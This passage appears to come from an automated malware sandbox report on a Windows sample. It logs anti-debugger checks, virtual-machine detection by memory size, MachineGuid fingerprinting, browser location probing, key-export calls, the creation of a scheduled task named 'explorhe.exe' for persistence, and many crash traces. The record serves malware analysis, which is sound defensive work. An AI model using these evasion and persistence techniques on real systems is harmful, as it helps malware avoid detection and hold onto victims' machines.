GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (26 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 5, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:44 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:44 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 5, 2024, 7:51 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleA Jan. 5, 2024, 7:50 a.m.	buffer: Unhandled Exception: console_handle: 0x0000000b	1	1
WriteConsoleA Jan. 5, 2024, 7:50 a.m.	buffer: Microsoft.CSharp.RuntimeBinder.RuntimeBinderException: '?????????????????????????????????????????' does not contain a definition for 'loader' at CallSite.Target(Closure , CallSite , Type , String , Object , Dictionary`2 , Dictionary`2 , Dictionary`2 , Dictionary`2 , Dictionary`2 , String ) at System.Dynamic.UpdateDelegates.UpdateAndExecuteVoid9[T0,T1,T2,T3,T4,T5,T6,T7,T8](CallSite site, T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4, T5 arg5, T6 arg6, T7 arg7, T8 arg8) at ?????????????????????????????????????????.?????????????????????????????????????????(String[] ) console_handle: 0x0000000b	1	1
WriteConsoleW Jan. 5, 2024, 7:50 a.m.	buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 161 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00780388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00780408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00780408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00808120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008081e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008081e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008081e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008081e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008081e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003284c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003280c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 5, 2024, 7:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00328288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 5, 2024, 7:49 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 79 events)

Time & API	Arguments	Status
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 100659256 registers.edi: 73414940 registers.eax: 100659256 registers.ebp: 100659336 registers.edx: 578 registers.ebx: 100659620 registers.esi: 2147746133 registers.ecx: 73322400	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 59104456 registers.edi: 1974991376 registers.eax: 59104456 registers.ebp: 59104536 registers.edx: 1 registers.ebx: 5944084 registers.esi: 2147746133 registers.ecx: 53142274	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x27ae89 @ 0x144ae89 2fy3903+0x26dff2 @ 0x143dff2 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175312 registers.edi: 22229232 registers.eax: 0 registers.ebp: 5175340 registers.edx: 2 registers.ebx: 434798961 registers.esi: 19587072 registers.ecx: 15415456	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x27ae89 @ 0x144ae89 2fy3903+0x26dff2 @ 0x143dff2 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175312 registers.edi: 5175312 registers.eax: 0 registers.ebp: 5175340 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175348	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x27ae89 @ 0x144ae89 2fy3903+0x26dff2 @ 0x143dff2 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175312 registers.edi: 5175312 registers.eax: 0 registers.ebp: 5175340 registers.edx: 0 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175348	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 20990632 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 15392768 registers.esi: 19587072 registers.ecx: 19587072	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26e691 @ 0x143e691 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ea47 @ 0x143ea47 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 20990632 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 15392768 registers.esi: 19587072 registers.ecx: 0	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ea47 @ 0x143ea47 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ea47 @ 0x143ea47 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
